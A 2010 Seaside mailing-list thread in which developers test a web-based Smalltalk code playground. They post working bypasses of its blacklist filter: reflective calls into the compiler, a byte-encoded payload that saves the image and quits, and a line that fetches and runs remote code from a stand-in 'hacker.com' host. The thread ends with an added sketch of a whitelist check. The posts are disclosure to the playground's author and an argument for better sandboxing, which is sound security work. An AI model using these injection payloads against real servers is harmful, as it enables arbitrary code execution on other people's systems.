Latest version should be really robust against hacks.
- undeclareds and signals are handled too

Gerhard

On Mon, Jan 11, 2010 at 12:22 PM, Germán Arduino <[hidden email]> wrote:
> Very interesting!

_______________________________________________
seaside mailing list
[hidden email]
http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside
On Mon, 11 Jan 2010, Gerhard Obermann wrote:
> Latest version should be really robust against hacks.

Try this in squeak/pharo:

{ 'Compile', 'r eval', 'uate: ''se', 'lf inform: ''''broken''''''' } evalStrings

Levente

> - undeclareds and signals are handled too
>
> Gerhard
>
> On Mon, Jan 11, 2010 at 12:22 PM, Germán Arduino <[hidden email]> wrote:
>
>> Very interesting!
>>
>> Thanks!
>>
>> 2010/1/10 Gerhard Obermann <[hidden email]>:
>>>
>>> Screenshot is attached!
>>>
>>> Gerhard
evalString(s) is now on the blacklist

Gerhard

2010/1/11 Levente Uzonyi <[hidden email]>
On Mon, 11 Jan 2010, Gerhard Obermann wrote:
> evalString(s) is now on the blacklist

Try this:

((#class value: 1) compilerClass theMetaClass methodDict at: #evaluate:)
    valueWithReceiver: (#class value: 1) compilerClass
    arguments: { 'se', 'lf inform: ''broken''' }

and let me know if it's available online. ;)

Levente
On Mon, 11 Jan 2010, Levente Uzonyi wrote:
> On Mon, 11 Jan 2010, Gerhard Obermann wrote:
>
>> evalString(s) is now on the blacklist
>
> Try this:
> ((#class value: 1) compilerClass theMetaClass methodDict at: #evaluate:)
> valueWithReceiver: (#class value: 1) compilerClass arguments: { 'se', 'lf
> inform: ''broken''' }

Oops, Array creation is not allowed, so I had to modify it a bit:

| a |
a := #(1).
a at: 1 put: 'se', 'lf inform: ''broken'''.
((#class value: 1) compilerClass theMetaClass methodDict at: #evaluate:)
    valueWithReceiver: (#class value: 1) compilerClass arguments: a

Levente

> and let me know if it's available online. ;)
It's online!

http://obi.ath.cx:8080/examples/playground

Gerhard

2010/1/11 Levente Uzonyi <[hidden email]>
Excellent, thanks for sharing!

2010/1/11 Gerhard Obermann <[hidden email]>:
> It's online!
>
> http://obi.ath.cx:8080/examples/playground
>
> Gerhard

--
Germán S. Arduino <gsa @ arsol.net> Twitter: garduino
Arduino Software & Web Hosting http://www.arduinosoftware.com
PasswordsPro http://www.passwordspro.com
In reply to this post by Gerhard Obermann
Gerhard this is really cool.
I have a couple of students that have just started to play with seaside and this is great!
We will try on them :)

Stef

On Jan 10, 2010, at 8:59 AM, Gerhard Obermann wrote:

> Screenshot is attached!
>
> Gerhard
> <Screen.png>
Thanks!
A lot of functionality will be added in the next few days!
I am open for suggestions too.

Gerhard

On Mon, Jan 11, 2010 at 8:22 PM, stephane ducasse <[hidden email]> wrote:
> Gerhard this is really cool.
In reply to this post by Lukas Renggli
Lukas
could they use your trick with using the debugger to interpret bytecode you did years ago?

Stef

On Jan 11, 2010, at 10:13 AM, Lukas Renggli wrote:

>> That's not a simple hack.
>> And it doesn't really take over the computer.
>
> Sure. As soon as I can execute arbitrary Smalltalk code on your
> machine, I can deploy a Trojan for your platform.
>
>> Anyway, such hacks are not possible anymore.
>
> There is an infinite number of other hacks. It gets harder over time,
> but the one below is particularly simple:
>
> html evaluateUnloggedForSelf: #[34 73 110 115 116 97 108 108 32 116
> 104 101 32 102 97 118 111 114 105 116 101 32 116 114 111 121 97 110 34
> 32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114
> 114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115
> 101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString
>
> My point is that no matter how much time you spend on making it secure
> by checking for particular patterns or strings, there will always be
> ways to fool it. In the Smalltalk world security is inherently weak,
> mostly because of the strong reflective capabilities. I would really
> love to see your application on the web, but in its current form we
> won't be able to run it on seaside.st.
>
> Lukas
>
> --
> Lukas Renggli
> http://www.lukas-renggli.ch
In reply to this post by Gerhard Obermann
It has been removed in pharo 1.1
We slowly want to pay attention to these kinds of simple and useless ways to break a Smalltalk image.

Stef

On Jan 11, 2010, at 1:51 PM, Gerhard Obermann wrote:

> evalString(s) is now on the blacklist
>
> Gerhard
>
> 2010/1/11 Levente Uzonyi <[hidden email]>
> On Mon, 11 Jan 2010, Gerhard Obermann wrote:
>
> Latest version should be really robust against hacks.
>
> Try this in squeak/pharo:
> { 'Compile', 'r eval', 'uate: ''se', 'lf inform: ''''broken''''''' } evalStrings
>
> Levente
In reply to this post by stephane ducasse
> could they use your trick with using the debugger to interpret bytecode you did years ago.

Yes, that would make it slightly more secure, because one could also
check the calls within the code and the receivers and arguments.
As with all the previous improvements, this will just make it slightly
more time consuming to find a working exploit. A highly reflective and
unsecured system like Smalltalk cannot be protected like that. If the
language doesn't provide the infrastructure to be secure (for example
through immutable objects, special execution environments, etc.) this
is not reasonably possible.

Lukas

--
Lukas Renggli
http://www.lukas-renggli.ch
I asked gwenael to see what can be done with his infrastructure and after the tools deadline I will really ask him to use it as a case study.
Same for jean-baptiste.

stef

On Jan 12, 2010, at 10:12 AM, Lukas Renggli wrote:

>> could they use your trick with using the debugger to interpret bytecode you did years ago.
>
> Yes, that would make it slightly more secure, because one could also
> check also the calls within the code and the receivers and arguments.
> As with all the previous improvements, this will just make it slightly
> more time consuming to find a working exploit. A highly reflective and
> unsecured system like Smalltalk cannot be protected like that. If the
> language doesn't provide the infrastructure to be secure (for example
> through immutable objects, special execution environments, etc.) this
> is not reasonably possible
>
> Lukas
In reply to this post by Lukas Renggli
Hi,

Maybe a whitelist approach would be better than the black list used now? There are so many ways that it is virtually impossible to write a complete black list.

It took me a while, but I finally managed to browse arbitrary code in the image, including the blacklist (implemented by #isSecure:). Knowing how this method is implemented makes it pretty easy to come up with a new exploit:

(nil environment at: ('https' asUppercase , 'ocket') asSymbol) httpFileIn: 'http://www.hacker.com/bad.st'

This one allows you to load and run arbitrary code.

HTH,
Adrian
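
The whitelist idea from the message above, sketched as an added example (not code from the thread or from the playground): a substring blacklist beside a parse-based selector allowlist, run over fragments already quoted in this thread. It assumes a Pharo image that provides RBParser; the blacklist entries, the allowlist entries and all variable names are made up for illustration.

```smalltalk
"Added example, not code from the thread or from the playground.
 Assumes a Pharo image that provides RBParser; every list below is
 illustrative and is not the playground's real #isSecure: list."
| blacklist allowedSelectors passesBlacklist passesAllowlist samples |

"Constructed blacklist using names that appear in the thread."
blacklist := #('Compiler' 'evaluate:' 'evalStrings' 'HTTPSocket').

"Constructed allowlist: arithmetic and a few side-effect-free string
 selectors. It contains no reflective or compiler-related selector."
allowedSelectors := #(#+ #- #* #< #> #= #max: #min: #size #reversed #asUppercase).

"Blacklist gate: accept unless a forbidden name occurs in the source text."
passesBlacklist := [:source |
	blacklist noneSatisfy: [:bad | source includesSubstring: bad]].

"Allowlist gate: parse first, then accept only when every message send
 uses a listed selector and no variable (self, globals, temps) is named."
passesAllowlist := [:source | | ast |
	ast := RBParser parseExpression: source onError: [:msg :pos | nil].
	ast notNil and: [
		ast allChildren allSatisfy: [:node |
			node isVariable not and: [
				node isMessage not or: [allowedSelectors includes: node selector]]]]].

"First sample is benign; the other two are fragments quoted from the thread."
samples := #('(3 + 4) max: 5'
	'(#class value: 1) compilerClass'
	'nil environment').

"Answer each source paired with { blacklist verdict. allowlist verdict }."
samples collect: [:source |
	source -> { passesBlacklist value: source. passesAllowlist value: source }]
```

Evaluated in a workspace, the benign sample passes both gates, while the two thread fragments pass the blacklist and are rejected by the allowlist. A source-level gate like this only narrows what reaches the compiler; it is not the language-level isolation Lukas describes as missing.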